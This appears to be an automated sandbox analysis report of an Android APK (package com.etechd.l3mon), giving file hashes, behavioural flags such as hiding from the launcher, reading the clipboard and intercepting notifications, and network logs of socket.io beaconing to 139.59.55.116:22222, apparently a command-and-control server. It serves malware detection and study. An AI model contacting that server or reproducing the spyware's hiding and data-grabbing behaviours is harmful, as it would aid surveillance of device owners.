Analysis

  • max time kernel
    6s
  • max time network
    151s
  • platform
    android-11_x64
  • resource
    android-x64-arm64-20240910-en
  • resource tags

    arch:arm, arch:arm64, arch:x64, arch:x86, image:android-x64-arm64-20240910-en, locale:en-us, os:android-11-x64, system
  • submitted
    06/12/2024, 15:37 UTC

General

  • Target

    build.s.apk

  • Size

    267KB

  • MD5

    6ef5af90e55da3e3060a2a3daca75e8f

  • SHA1

    1d8fb6a2061feb0b3493591bd18b13dd7ebc67e3

  • SHA256

    1d000ef8d964ba22acf820debd2c24222ff34353c145d69e4266eb2cc7588ba3

  • SHA512

    be954dc69c6b800141ba83d492fa5b5de880f2abe9f4cf455a6813f3f835babf755dd3ff11fc71cd150b3376630aa24ca51cce2e62dc487d0f8d4ffbb9e3d302

  • SSDEEP

    6144:VGXDhYcKa6we5EoC29CZQORrWLn6BuEIQbq3AxrqbvNv90F:VFRpR5FCsC9rWL6HBe3sqB9Y

Malware Config

Signatures

Processes

  • com.etechd.l3mon
    1⤵
    • Removes its main activity from the application launcher
    • Obtains sensitive information copied to the device clipboard
    • Requests accessing notifications (often used to intercept notifications before users become aware).
    PID:4816

Network

  • flag-us
    DNS
    www.youtube.com
    Remote address:
    1.1.1.1:53
    Request
    www.youtube.com
    IN A
    Response
    www.youtube.com
    IN CNAME
    youtube-ui.l.google.com
  • flag-us
    DNS
    android.apis.google.com
    Remote address:
    1.1.1.1:53
    Request
    android.apis.google.com
    IN A
    Response
    android.apis.google.com
    IN CNAME
    clients.l.google.com
    clients.l.google.com
    IN A
    142.250.179.238
  • flag-in
    GET
    http://139.59.55.116:22222/socket.io/?model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&release=11&manf=Google
    Remote address:
    139.59.55.116:22222
    Request
    GET /socket.io/?model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&release=11&manf=Google HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 139.59.55.116:22222
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 104
    Access-Control-Allow-Origin: *
    Set-Cookie: io=Ir0Ntgjo4E_TdUyRAAAC; Path=/; HttpOnly; SameSite=Strict
    Date: Fri, 06 Dec 2024 15:37:20 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
  • flag-in
    GET
    http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC
    Remote address:
    139.59.55.116:22222
    Request
    GET /socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 139.59.55.116:22222
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 16
    Access-Control-Allow-Origin: *
    Set-Cookie: io=Ir0Ntgjo4E_TdUyRAAAC; Path=/; HttpOnly; SameSite=Strict
    Date: Fri, 06 Dec 2024 15:37:20 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
  • flag-in
    GET
    http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC
    Remote address:
    139.59.55.116:22222
    Request
    GET /socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 139.59.55.116:22222
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 3
    Access-Control-Allow-Origin: *
    Set-Cookie: io=Ir0Ntgjo4E_TdUyRAAAC; Path=/; HttpOnly; SameSite=Strict
    Date: Fri, 06 Dec 2024 15:37:20 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
  • flag-in
    GET
    http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=websocket&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC
    Remote address:
    139.59.55.116:22222
    Request
    GET /socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=websocket&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC HTTP/1.1
    Upgrade: websocket
    Connection: Upgrade
    Sec-WebSocket-Key: zEG2Er3Ggok4/hLNGZbPQA==
    Sec-WebSocket-Version: 13
    Host: 139.59.55.116:22222
    Accept-Encoding: gzip
    User-Agent: okhttp/3.5.0
    Response
    HTTP/1.1 101 Switching Protocols
    Upgrade: websocket
    Connection: Upgrade
    Sec-WebSocket-Accept: cesk/Q/svl/xCPQowiVARWCwJbs=
  • flag-us
    DNS
    ssl.google-analytics.com
    Remote address:
    1.1.1.1:53
    Request
    ssl.google-analytics.com
    IN A
    Response
    ssl.google-analytics.com
    IN A
    142.250.187.232
  • 216.239.38.223:443
    https
    336 B
    40 B
    1
    1
  • 142.250.187.238:443
    tls, https
    1.4kB
    40 B
    1
    1
  • 172.217.16.238:443
    www.youtube.com
    tls
    2.1kB
    8.3kB
    18
    15
  • 142.250.179.238:443
    android.apis.google.com
    tls
    2.6kB
    6.1kB
    13
    11
  • 142.250.179.238:443
    android.apis.google.com
    tls
    2.7kB
    6.1kB
    13
    11
  • 139.59.55.116:22222
    http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC
    http
    1.3kB
    1.3kB
    9
    7

    HTTP Request

    GET http://139.59.55.116:22222/socket.io/?model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&release=11&manf=Google

    HTTP Response

    200

    HTTP Request

    GET http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC

    HTTP Response

    200

    HTTP Request

    GET http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC

    HTTP Response

    200
  • 139.59.55.116:22222
    http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=websocket&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC
    http
    1.3kB
    732 B
    17
    11

    HTTP Request

    GET http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=websocket&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC

    HTTP Response

    101
  • 142.250.187.232:443
    ssl.google-analytics.com
    tls
    1.3kB
    6.3kB
    9
    9
  • 142.250.200.46:443
    www.youtube.com
    tls
    135 B
    40 B
    2
    1
  • 142.250.200.33:443
    tls
    135 B
    40 B
    2
    1
  • 216.239.38.223:443
    tls, https
    128 B
    40 B
    2
    1
  • 216.58.204.65:443
    tls
    135 B
    40 B
    2
    1
  • 216.239.38.223:443
    tls, https
    128 B
    40 B
    2
    1
  • 224.0.0.251:5353
    3.7kB
    11
  • 1.1.1.1:53
    www.youtube.com
    dns
    61 B
    319 B
    1
    1

    DNS Request

    www.youtube.com

    DNS Response


  • 1.1.1.1:53
    android.apis.google.com
    dns
    69 B
    109 B
    1
    1

    DNS Request

    android.apis.google.com

    DNS Response

    142.250.179.238

  • 172.217.16.238:443
    www.youtube.com
    https
    1.4kB
    54 B
    1
    1
  • 1.1.1.1:53
    ssl.google-analytics.com
    dns
    70 B
    86 B
    1
    1

    DNS Request

    ssl.google-analytics.com

    DNS Response

    142.250.187.232

MITRE ATT&CK Mobile v15
